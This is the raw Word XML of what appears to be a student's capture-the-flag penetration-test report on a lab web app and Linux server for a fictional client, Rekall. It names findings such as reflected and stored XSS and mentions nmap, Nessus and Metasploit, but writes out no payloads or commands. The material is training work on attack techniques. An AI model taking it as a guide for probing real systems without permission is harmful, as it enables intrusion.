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Fonts w:ascii="Oswald Light" w:cs="Oswald Light" w:eastAsia="Oswald Light" w:hAnsi="Oswald Light"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5344</w:t>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42"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Student Note</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Complete all sections highlighted </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">in yellow.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id w:val="468779912"/>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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Neal LLS</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40">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Camron Neal</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42">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Penetration Tester</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525.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="33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80"/>
        <w:gridCol w:w="2280"/>
        <w:gridCol w:w="2265"/>
        <w:gridCol w:w="2700"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2280"/>
            <w:gridCol w:w="2280"/>
            <w:gridCol w:w="2265"/>
            <w:gridCol w:w="2700"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4/22/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Camron Neal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Day 1 of CTF Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4/25/2025-4/26/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Camron Neal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Day 2 of CTF Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4/26/2025-4/27/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Camron Neal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Day 3 of CTF Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4/28/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Camron  Neal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Final draft of CTF Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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For the testing, we focused on the following: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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Documenting and reporting on all findings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:ind w:firstLine="3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Rekall has outlined the following objectives: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8">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9">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A">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B">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7C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromise several machines.</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84">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9B">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D">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E">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A3">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A4">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5">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6">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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3545840"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Chart&#10;&#10;Description automatically generated with medium confidence" id="48" name="image52.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Chart&#10;&#10;Description automatically generated with medium confidence" id="0" name="image52.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High-level summary of strengths here</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Latest anti-malware is being kept up to date.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3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output encoder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML Sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevent Probes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update and Patch software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update apache struts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User credentials being removed from websites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict public access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using FTPS and SFTP instead of FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close port 110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safeguard password hashes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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Neal LLS was hired to complete a vulnerability test on the system of the client Rekall to find vulnerabilities within the system and to provide an assessment of the findings. </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Starting from day 1, we navigated through the Totalrekall.xyz website to complete various scripts to get around the web app. These scripts were used to bypass certain access points through the website.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Day 2, we were in Linux OS and the group exposed the Totalrekall.xyz from linux using various exploits from tools from DNS lookup and certification search to nmap scanning and different exploits to gain access to different files.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Day 3, the group exploited the system with the msf6 using the command msfconsole. This exploit had different options of exploits that you could navigate through. This exploit allowed us to view different files that have root access and see where the files are located.</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With all of the tools to expose the vulnerabilities such as Metasploit, Nessus and Nmap we were able to reveal what is a risk and how it should be eliminated.</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pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cfhhjz91pgo" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tr5kilpcz7z8" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>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5"/>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D9">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DA">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff0000"/>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DD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag 1 Cross Site Scripting XSS- Welcome.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag 2 </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1f2328"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross Site Scripting XSS #2- VR Planner.php</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag 3 XSS Stored Vulnerability Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag 4 Sensitive Data Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>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E7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag1 Open Source Exposure Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag2 Pinging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
